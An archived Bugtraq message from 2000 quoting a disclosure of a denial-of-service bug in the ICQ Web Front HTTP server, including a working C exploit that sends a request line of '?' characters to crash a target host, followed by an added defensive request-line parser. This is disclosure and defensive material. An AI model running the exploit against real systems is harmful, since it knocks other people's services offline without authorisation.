[17108] in bugtraq
Re: ICQ WebFront HTTPd DoS
daemon@ATHENA.MIT.EDU (Philip Stoev)
Mon Oct 9 14:25:12 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <006b01c031e8$7f59a910$0100a8c0@ntserver1>
Date: Mon, 9 Oct 2000 15:00:14 +0300
Reply-To: Philip Stoev <philip@EINET.BG>
From: Philip Stoev <philip@EINET.BG>
To: BUGTRAQ@SECURITYFOCUS.COM
Nothing new under the sun.
http://www.securityfocus.com/archive/1/50363
Philip
----- Original Message -----
From: "skrilla in money order only" <chear@BEEF.TPGN.NET>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, October 07, 2000 3:51 PM
Subject: ICQ WebFront HTTPd DoS
> ICQ Web Front DoS
> -
> Exploit and Discovery By: Charles Chear [chear@beef.tpgn.net]
>
> Description:
> More current ICQ clients now offer a mini httpd for members' desktops
> called the Web Front. It seems that appending a "?" character
> (and possibly other characters) to the URL will cause the httpd to
> crash, if not the whole client altogether. Tested on Windows 95/98.
>
> Greets:
> Colloron, Joshd, Presto, tpgn.net, and all the other gangsters.
>
> -- bite here --
>
> /* ICQ Web Front DoS */
>
> #include <sys/socket.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <netinet/in.h>
> #include <netdb.h>
>
> int main(int argc, char *argv[])
> {
>     int sock;
>     struct sockaddr_in sin;
>     struct hostent *he;
>
>     /* added extra ? to be on the safe side :) */
>     char xploitstr1[50]="GET /?????????? HTTP/1.0 \n\n";
>
>     printf("ICQ Web Front DoS - author: char0hlz/tPG\n");
>     printf("The Poor Gurus' Network [http://www.tpgn.net]\n");
>
>     if (argc<2)
>     {
>         printf("usage: %s <hostname>\n", argv[0]);
>         exit(0);
>     }
>     /* resolve the host name given on the command line */
>     if ((he=gethostbyname(argv[1])) == NULL)
>     {
>         herror("gethostbyname");
>         exit(0);
>     }
>     sock=socket(AF_INET,SOCK_STREAM,0);
>     memset(&sin, 0, sizeof(sin));
>     memcpy(&sin.sin_addr, he->h_addr, he->h_length);
>     sin.sin_family=AF_INET;
>     sin.sin_port=htons(80);
>     if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0)
>     {
>         perror("pr0blemz");
>         exit(1); /* nothing to send to if the connection failed */
>     }
>     /* send the request line and close the connection */
>     send(sock,xploitstr1,strlen(xploitstr1),0);
>     close(sock);
>
>     printf("Done. Refresh the page to see if it worked.\n");
>     return 0;
> }
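
Added example, not part of either post and not ICQ's code: neither message states why the Web Front crashes, so this does not reconstruct the bug. It shows how an embedded HTTP server can parse the kind of request line quoted above (a target made only of "?" characters, a trailing space, bare LF line endings) with explicit bounds; `MAX_TARGET`, `struct req_line` and `parse_request_line` are hypothetical names, and only GET is accepted.

```c
#include <stddef.h>
#include <string.h>

#define MAX_TARGET 256            /* assumed limit, not taken from the post */

struct req_line {
    char path[MAX_TARGET];        /* target up to the first '?' */
    char query[MAX_TARGET];       /* everything after the first '?', kept opaque */
};

/* Returns 0 on success, otherwise the HTTP status the server should answer with. */
int parse_request_line(const char *buf, size_t len, struct req_line *out)
{
    const char *eol = memchr(buf, '\n', len);
    if (eol == NULL)
        return 400;                               /* no complete line received */
    size_t n = (size_t)(eol - buf);
    while (n > 0 && (buf[n - 1] == '\r' || buf[n - 1] == ' '))
        n--;                                      /* tolerate CR and trailing spaces */

    const char *sp1 = memchr(buf, ' ', n);
    if (sp1 == NULL)
        return 400;
    if ((size_t)(sp1 - buf) != 3 || memcmp(buf, "GET", 3) != 0)
        return 501;                               /* method not implemented */

    const char *tgt = sp1 + 1;
    const char *sp2 = memchr(tgt, ' ', n - (size_t)(tgt - buf));
    if (sp2 == NULL)
        return 400;                               /* HTTP version missing */
    size_t tlen = (size_t)(sp2 - tgt);
    size_t vlen = n - (size_t)(sp2 + 1 - buf);
    if (vlen != 8 || memcmp(sp2 + 1, "HTTP/1.", 7) != 0)
        return 400;
    if (tlen == 0 || tgt[0] != '/')
        return 400;

    const char *q = memchr(tgt, '?', tlen);       /* split at the FIRST '?' only */
    size_t plen = q ? (size_t)(q - tgt) : tlen;
    size_t qlen = q ? tlen - plen - 1 : 0;
    if (plen >= MAX_TARGET || qlen >= MAX_TARGET)
        return 414;                               /* reject instead of truncating */
    for (size_t i = 0; i < tlen; i++)
        if ((unsigned char)tgt[i] < 0x21 || (unsigned char)tgt[i] > 0x7e)
            return 400;                           /* control or non-ASCII byte */

    memcpy(out->path, tgt, plen);
    out->path[plen] = '\0';
    if (q != NULL)
        memcpy(out->query, q + 1, qlen);
    out->query[qlen] = '\0';
    return 0;
}
```

For the quoted request the parser returns 0 with path "/" and a query consisting only of "?" characters, which the server can then serve as the root page or answer with an error.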